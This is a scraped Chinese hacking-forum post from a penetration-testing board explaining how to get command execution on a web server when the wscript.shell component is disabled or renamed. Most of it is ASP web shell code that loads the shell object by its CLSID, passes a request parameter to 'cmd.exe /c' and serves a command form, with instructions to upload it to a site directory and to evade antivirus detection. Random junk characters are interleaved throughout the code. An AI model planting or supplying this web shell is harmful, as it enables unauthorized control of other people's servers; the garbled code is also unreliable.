找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2682|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
    ; a. V& ~! Z1 U8 z: v6 Z
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
    ; x1 I/ L" ]& P6 C
  • 要想让运行命令可以试试这种方法,成功率为五五之数。3 j; U! Z, i& \0 U4 V- w
  • 把下面代码复制:
    - q- H! a/ S5 W1 Q  |
  • <%
    , i; m! U, @4 x" h- H2 x
  • end if& R" h0 s( P3 G, W
  • response.write(”")
    * L7 T) g6 @( I
  • On Error Resume
    ; N$ ?1 b" M+ O1 T- d
  • Next9 |% L1 U* V) C/ r
  • response.write oScriptlhn.exec(”cmd.exe /c” & * `. c% l0 u5 [8 `; v
  • request(”c”)).stdout.readall
    ! w+ ~: o4 n' M' y3 ~- }8 L  V
  • response.write(”")
    5 u+ `+ G% x' X/ p% W; O9 V
  • response.write(”")
    $ z- `* ^; \' x/ h( ]- U5 A0 }
  • response.write(”
      \8 B/ {6 B6 w5 t% \
  • “)
    1 o0 G- L( I$ z( W1 t' W
  • response.write(”")  w# v: t& z4 a' I5 ~( B& k
  • %>
      P" f( X9 E. Q& ]  I) b' y
  • 保存为一个asp文件,然后传到网站目录上去3 N5 ~6 P4 X7 ^2 ?. o
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
    & C9 x7 B& U, w3 ?) d
  • 我用此成功运行过cacls命令。
    5 l! R  r4 E- Z9 R  _
  • 第二那就是运行时出错,可能限制某些代码执行
    ! [0 C2 t9 p' |5 ?" ^7 b* y, ~3 g: P
  • 无wscript.shell组件提权又一个方法! a+ s' o0 S2 x/ P# ^$ \# y
  • <object runat=server id=oScriptlhn scope=page ! U% r+ y# O& G# k  _! [
  •   c) N2 f( g; J
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>( W& B8 t1 a, a; `' \
  • <%if err then%>
    4 M* G8 I7 V* Q4 i6 o
  • <object runat=server id=oScriptlhn scope=page
    # `! ~. r: K/ Y* I7 O5 t

  • ) M3 w  g) f6 \% Q$ G
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
    6 I0 }: X8 L, {: C5 ~; m
  • <% ) h5 d3 B7 \+ g) m( W
  • end if ) O) G2 r9 E  w  {
  • response.write(”<textarea readonly cols=80 ! C; x, J' G; W6 d' D3 v
  • ) `3 v  f8 y1 F. P
  • rows=20>”) # O" \- D8 T4 Y0 a# t% R' w
  • On Error Resume Next 4 j. D  G7 J( U0 o  o
  • response.write & |5 b" V' W9 A

  • ' X% {" V$ ?' O" H7 E
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall$ P. o, U3 v/ T3 \- v
  • response.write(”</textarea>”)
    8 b% x4 W# X% g# D- W  z
  • response.write(”<form 7 f2 }( T+ D1 a, y) N, {$ F

  • / J* @8 y4 h$ S1 e2 o9 ?
  • method=’post’>”) 0 K8 i' ~: l8 [+ V+ I  b
  • response.write(”<input type=text name=’c' ' e- L8 B, B9 |  c

  • % ~  u$ n3 u( j6 _, v/ _2 e
  • size=60><br>”)
    + w) e/ ^3 d! u6 n* x
  • response.write(”<input type=submit
    # {) Q2 ]( b& z9 G! T

  • * ~( h# x1 `7 C6 _! o+ o
  • value=’执行’></form>”)
    0 k( f# w; P7 X9 d# r6 }# q+ }
  • %>
    . a) r& z! E4 ?9 ^
  • 保存为ASP,此代码可能被杀,请注意免杀。
    5 w% w' E1 ~- b, H# ?5 s1 Y- _, p0 `
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建+ a( s: c4 s1 W& _, h7 Z( ~! U
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表